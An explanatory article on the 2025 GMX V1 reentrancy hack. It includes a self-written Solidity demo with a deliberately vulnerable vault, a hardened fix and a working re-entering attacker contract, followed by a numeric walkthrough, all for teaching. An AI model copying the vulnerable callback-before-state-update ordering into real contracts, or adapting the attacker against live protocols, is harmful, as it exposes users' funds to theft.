GMX V1 Reentrancy Exploit: How a Classic Bug Drained $42M
A detailed breakdown of the July 2025 GMX V1 hack—how a well-known smart contract vulnerability enabled huge losses, and the updated norms for DeFi security audits.

GMX V1 Reentrancy Exploit: New Code, Old Vulnerabilities
Exposing the Reentrancy Sequence
In July 2025, GMX Version 1, the original perpetual DEX, was hit for $42 million by an attacker who leveraged a reentrancy bug in the executeDecreaseOrder() function. This function executes a user's decrease order (reducing or closing a position and paying out the freed collateral) but, due to an upgrade in its state-handling logic, handed control to a user-supplied contract before critical accounting variables (notably the global average short price) had been updated. Because GLP is priced from the pool's assets under management, and that figure is charged with the unrealised profit and loss of every open short, a stale global average short price let the attacker push the protocol's price metrics out of sync with the market and redeem at an artificially favourable rate.
The reentrancy window was introduced by a previous hotfix in late 2024 that sought to patch a race condition in global position tracking for shorts. The new logic called out to the user's contract before it had updated the protocol's own state, which broke the atomicity of the order and opened the window. The attacker deployed a contract that, on receiving the refund callback, re-entered executeDecreaseOrder() before the outer call had finished, and each nested pass left the global price metrics further from their true values. By the end, the exploit had drained $42M, mostly by redeeming GLP at a price derived from an inflated assets-under-management figure. After negotiation, the attacker returned most of the funds in exchange for a $5M whitehat bounty.
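To make the sequence concrete, the following example was written for this page and is not GMX's code. It models the pattern in a stripped-down Solidity vault; every name in it (ShortVaultBase, VulnerableVault, HardenedVault, Attacker, the size-weighted globalShortWeighted accumulator, the 10% refund rule and the unpermissioned setMarkPrice helper) is an assumption made for the demo, as is the choice to pay the refund as a callback argument rather than ETH. The vulnerable order path calls the receiver before it updates global short accounting; the attacker names itself as receiver and re-enters once, so the same close is applied to the global accumulators twice. The hardened version applies the effects first and adds a reentrancy lock, the ordering GMX adopted after the incident.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, stripped-down model written for this article (not GMX code).
// The vault keeps a global short size and a size-weighted accumulator; the
// global average short price derived from them is what a pool would use to
// value its assets, so any drift in it misprices the pool's LP token.

interface IDecreaseOrderReceiver {
    function onDecreaseOrder(uint256 refund) external;
}

interface IShortVault {
    function increaseShort(uint256 size) external;
    function executeDecreaseOrder(address receiver) external;
}

abstract contract ShortVaultBase {
    struct Position { uint256 size; uint256 entryPrice; }

    mapping(address => Position) public shorts;
    uint256 public globalShortSize;      // sum of all open short sizes
    uint256 public globalShortWeighted;  // sum of size * entryPrice
    uint256 public markPrice;            // demo "oracle"; unpermissioned on purpose

    constructor(uint256 _markPrice) { markPrice = _markPrice; }

    function setMarkPrice(uint256 p) external { markPrice = p; }

    function globalShortAveragePrice() public view returns (uint256) {
        return globalShortSize == 0 ? 0 : globalShortWeighted / globalShortSize;
    }

    // Opening a short folds it into the global accumulators.
    function increaseShort(uint256 size) external {
        Position storage p = shorts[msg.sender];
        p.size += size;
        p.entryPrice = markPrice; // toy: one entry price per account
        globalShortSize += size;
        globalShortWeighted += size * markPrice;
    }

    function _removeFromGlobal(uint256 size, uint256 entryPrice) internal {
        globalShortSize -= size;
        globalShortWeighted -= size * entryPrice;
    }

    // Toy refund rule: 10% of size, delivered as a callback argument.
    function _refundFor(uint256 size) internal pure returns (uint256) { return size / 10; }
}

// VULNERABLE: the receiver is called before the global accounting is updated.
contract VulnerableVault is ShortVaultBase {
    constructor(uint256 p) ShortVaultBase(p) {}

    function executeDecreaseOrder(address receiver) external {
        Position memory p = shorts[msg.sender];    // snapshot taken before the call
        require(p.size > 0, "no position");
        IDecreaseOrderReceiver(receiver).onDecreaseOrder(_refundFor(p.size)); // re-entry point
        _removeFromGlobal(p.size, p.entryPrice);   // re-applied once per nested call
        delete shorts[msg.sender];
    }
}

// HARDENED: effects before interaction, plus a reentrancy lock.
contract HardenedVault is ShortVaultBase {
    uint256 private _lock = 1;
    modifier nonReentrant() { require(_lock == 1, "reentrant"); _lock = 2; _; _lock = 1; }

    constructor(uint256 p) ShortVaultBase(p) {}

    function executeDecreaseOrder(address receiver) external nonReentrant {
        Position memory p = shorts[msg.sender];
        require(p.size > 0, "no position");
        _removeFromGlobal(p.size, p.entryPrice);   // effects first
        delete shorts[msg.sender];
        IDecreaseOrderReceiver(receiver).onDecreaseOrder(_refundFor(p.size)); // interaction last
    }
}

// The attacker holds a short and names itself as receiver so the callback can re-enter.
contract Attacker is IDecreaseOrderReceiver {
    IShortVault public immutable vault;
    uint256 public refunds;
    uint256 public passes;
    // With the walkthrough numbers a 3rd pass would underflow globalShortWeighted and revert.
    uint256 public constant MAX_PASSES = 2;

    constructor(address v) { vault = IShortVault(v); }

    function attack(uint256 size) external {
        vault.increaseShort(size);
        vault.executeDecreaseOrder(address(this));
    }

    function onDecreaseOrder(uint256 refund) external {
        require(msg.sender == address(vault), "not vault");
        refunds += refund;
        if (++passes < MAX_PASSES) vault.executeDecreaseOrder(address(this)); // re-enter
    }
}
```

Walkthrough (constructed numbers): deploy a vault with mark price 100, have an honest trader call increaseShort(300), call setMarkPrice(200), then have the Attacker call attack(100). Before the close the vault holds size 400 and weighted sum 50,000, an average of 125. An honest close of the attacker's position would leave 300 / 30,000, average 100. Against VulnerableVault the nested pass applies the removal twice, leaving 200 / 10,000, average 50, and the attacker collects the 10-unit refund twice. A pool that, like GLP, adds shorts' unrealised losses to its assets under management would now value its shorts against an average of 50 while the market sits at 100, and book a large phantom loss for them, which is the kind of inflated asset figure the redemption side of the exploit fed on. Against HardenedVault the same attack reverts with "reentrant"; even without the lock, the re-entry would find an already-deleted position and fail the "no position" check, which is why both the ordering and the lock are worth having.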
Code Legacy and New Audit Culture
The GMX incident reinforced that even "solved" bug classes like reentrancy reappear whenever protocol logic is changed in a hurry, especially in response to urgent issues. GMX's vulnerability arose not from the original design but from an upgrade shipped after the code had already been through audit and bug-bounty review. The lesson is that every upgraded contract path needs the same exhaustive security review as a launch, plus regression tests that include an attempt to re-enter through every external call the new path makes.
After the exploit, GMX replaced its external-call logic with push-only internal accounting, enforced complete state updates before any user callback (the checks-effects-interactions ordering), and mandated a third-party audit on every codebase change. Formal verification is now required after material upgrades, not just at initial deployment. One caveat for anyone applying the same fixes: a reentrancy guard only protects the functions it is applied to, so a guard on the order path does nothing if the same global state is reachable through another entry point (a vault, router or tracker contract) that the callback can call directly; the invariant has to hold across every external entry point that reads or writes that state. For the broader DeFi sector, the GMX hack repeats a familiar message: every fix creates a new attack surface unless change management gets the same scrutiny as launches. Reentrancy risk is not historical; it is perpetual wherever composability is not managed by design and tested at every turn.